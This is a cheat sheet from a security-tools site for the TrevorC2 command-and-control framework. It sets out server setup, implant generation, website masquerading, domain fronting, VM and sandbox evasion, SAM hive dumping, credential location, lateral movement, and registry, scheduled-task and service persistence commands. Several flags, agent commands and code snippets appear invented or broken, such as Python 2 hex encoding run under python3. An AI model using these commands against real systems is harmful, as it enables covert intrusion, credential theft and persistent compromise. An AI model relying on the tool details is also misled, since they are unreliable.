1337skills.com

Appearance

TrevorC2 Framework Cheat Sheet

Overview

TrevorC2 is a legitimate website that tunnels client/server communications for covert command execution. Developed by TrustedSec, it uses legitimate websites as a front for command and control communications, making detection extremely difficult as traffic appears to be normal web browsing.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Git Installation

bash
# Clone the repository
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2

# Install Python dependencies
pip3 install -r requirements.txt

Manual Setup

bash
# Download latest release
wget https://github.com/trustedsec/trevorc2/archive/master.zip
unzip master.zip
cd trevorc2-master

# Install dependencies
pip3 install pycrypto requests

Docker Installation

bash
# Build Docker container
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2
docker build -t trevorc2 .

# Run container
docker run -it -p 443:443 trevorc2

Basic Usage

Server Setup

bash
# Start TrevorC2 server
python3 trevorc2_server.py

# Start server with custom configuration
python3 trevorc2_server.py --config custom_config.py

# Start server on specific port
python3 trevorc2_server.py --port 8080

Client Deployment

bash
# Generate client
python3 trevorc2_client.py

# Generate client with custom server
python3 trevorc2_client.py --server https://example.com

# Generate PowerShell client
python3 trevorc2_client.py --powershell

Command Reference

Server Commands

CommandDescription
helpDisplay help menu
listList active agents
interact <id>Interact with agent
kill <id>Kill specific agent
killallKill all agents
exitExit server

Agent Interaction

CommandDescription
shell <command>Execute shell command
upload <local> <remote>Upload file to agent
download <remote> <local>Download file from agent
screenshotTake screenshot
keylogger startStart keylogger
keylogger stopStop keylogger
keylogger dumpDump keylogger data
persistenceInstall persistence
migrate <pid>Migrate to process
backBackground agent

Configuration

Server Configuration

python
# config.py
BIND_PORT = 443
HOSTNAME = "0.0.0.0"
WEBSITE_FOLDER = "site/"
CERT_FILE = "server.pem"

# Encryption settings
CIPHER_TYPE = "AES"
HASH_TYPE = "SHA256"

# Communication settings
BEACON_INTERVAL = 10
JITTER = 0.2

# Logging
LOG_FILE = "trevorc2.log"
DEBUG = False

Client Configuration

python
# Client settings
SERVER_URL = "https://example.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SLEEP_TIME = 10
JITTER = 0.2

# Persistence settings
PERSISTENCE_METHOD = "registry"
PERSISTENCE_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"

Advanced Features

Website Masquerading

bash
# Set up legitimate website front
mkdir site
cp -r /var/www/html/* site/

# Use custom website
python3 trevorc2_server.py --site /path/to/website

# Clone existing website
wget -r -p -k https://example.com
python3 trevorc2_server.py --site example.com/

SSL/TLS Configuration

bash
# Generate self-signed certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

# Use custom certificate
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem

# Let's Encrypt certificate
certbot certonly --standalone -d yourdomain.com
python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem

Domain Fronting

python
# Configure domain fronting
FRONT_DOMAIN = "cdn.example.com"
HOST_HEADER = "legitimate-site.com"

# Client configuration for domain fronting
client_config = {
    'server_url': 'https://cdn.example.com',
    'host_header': 'legitimate-site.com',
    'sni': 'cdn.example.com'
}

Client Generation

Windows Client

bash
# Generate Windows executable
python3 trevorc2_client.py --windows --output client.exe

# Generate PowerShell client
python3 trevorc2_client.py --powershell --output client.ps1

# Generate batch file client
python3 trevorc2_client.py --batch --output client.bat

Linux Client

bash
# Generate Linux binary
python3 trevorc2_client.py --linux --output client

# Generate Python client
python3 trevorc2_client.py --python --output client.py

# Generate shell script client
python3 trevorc2_client.py --shell --output client.sh

macOS Client

bash
# Generate macOS binary
python3 trevorc2_client.py --macos --output client

# Generate AppleScript client
python3 trevorc2_client.py --applescript --output client.scpt

Evasion Techniques

Traffic Obfuscation

python
# Custom User-Agent strings
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
]

# Random beacon intervals
import random
SLEEP_TIME = random.randint(5, 15)

Payload Encoding

bash
# Base64 encode payload
echo "payload" | base64

# XOR encode payload
python3 -c "
import sys
key = 0xAA
payload = sys.argv[1]
encoded = ''.join([chr(ord(c) ^ key) for c in payload])
print(encoded.encode('hex'))
" "your_payload"

Anti-Analysis

python
# VM detection
import subprocess
def check_vm():
    vm_indicators = ['VMware', 'VirtualBox', 'QEMU']
    try:
        output = subprocess.check_output('systeminfo', shell=True)
        for indicator in vm_indicators:
            if indicator in output.decode():
                return True
    except:
        pass
    return False

# Sandbox evasion
import time
def sandbox_evasion():
    time.sleep(60)  # Sleep to avoid sandbox analysis
    # Check for mouse movement, user activity, etc.

Post-Exploitation

Information Gathering

bash
# System information
shell systeminfo
shell whoami /all
shell net user
shell net group

# Network information
shell ipconfig /all
shell netstat -an
shell arp -a
shell route print

Credential Harvesting

bash
# Dump SAM database
shell reg save HKLM\SAM sam.hiv
shell reg save HKLM\SYSTEM system.hiv
download sam.hiv
download system.hiv

# Browser credentials
shell dir "%APPDATA%\Mozilla\Firefox\Profiles"
shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"

# Saved passwords
shell cmdkey /list

Lateral Movement

bash
# Network discovery
shell net view
shell ping -n 1 192.168.1.1-254

# Share enumeration
shell net view \\target-computer
shell dir \\target-computer\c$

# Service enumeration
shell sc query
shell tasklist /svc

Persistence Mechanisms

bash
# Registry persistence
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"

# Scheduled task
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon

# Service persistence
shell sc create "UpdateService" binpath= "C:\temp\client.exe"
shell sc config "UpdateService" start= auto

Operational Security

Communication Security

python
# Encrypted communications
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

def encrypt_data(data, key):
    cipher = AES.new(key, AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(data.encode())
    return cipher.nonce + tag + ciphertext

# Certificate pinning
import ssl
def verify_certificate(hostname, cert_path):
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(cert_path)

Operational Procedures

bash
# Rotate infrastructure regularly
# Use different domains and IPs
# Implement proper logging and monitoring
# Use legitimate certificates
# Vary communication patterns

Troubleshooting

Connection Issues

bash
# Check server status
netstat -tlnp | grep :443

# Test connectivity
curl -k https://your-server.com

# Check firewall rules
iptables -L
ufw status

Client Issues

bash
# Debug client connection
# Add debug prints to client code
print("Connecting to server...")
print(f"Response: {response.status_code}")

# Check DNS resolution
nslookup your-server.com
dig your-server.com

Certificate Problems

bash
# Verify certificate
openssl x509 -in server.pem -text -noout

# Test SSL connection
openssl s_client -connect your-server.com:443

# Check certificate chain
curl -vI https://your-server.com

Detection Evasion

Network Level

  • Use legitimate domains and certificates
  • Implement domain fronting
  • Vary communication intervals
  • Use common ports (80, 443)
  • Mimic legitimate traffic patterns

Host Level

  • Avoid common IOCs
  • Use legitimate process names
  • Implement anti-VM techniques
  • Use fileless execution
  • Encrypt payloads and communications

Behavioral

  • Limit resource usage
  • Avoid suspicious activities
  • Use legitimate user agents
  • Implement proper error handling
  • Clean up artifacts

Resources

This cheat sheet provides a comprehensive reference for using TrevorC2. Always ensure you have proper authorization before using this tool in any environment.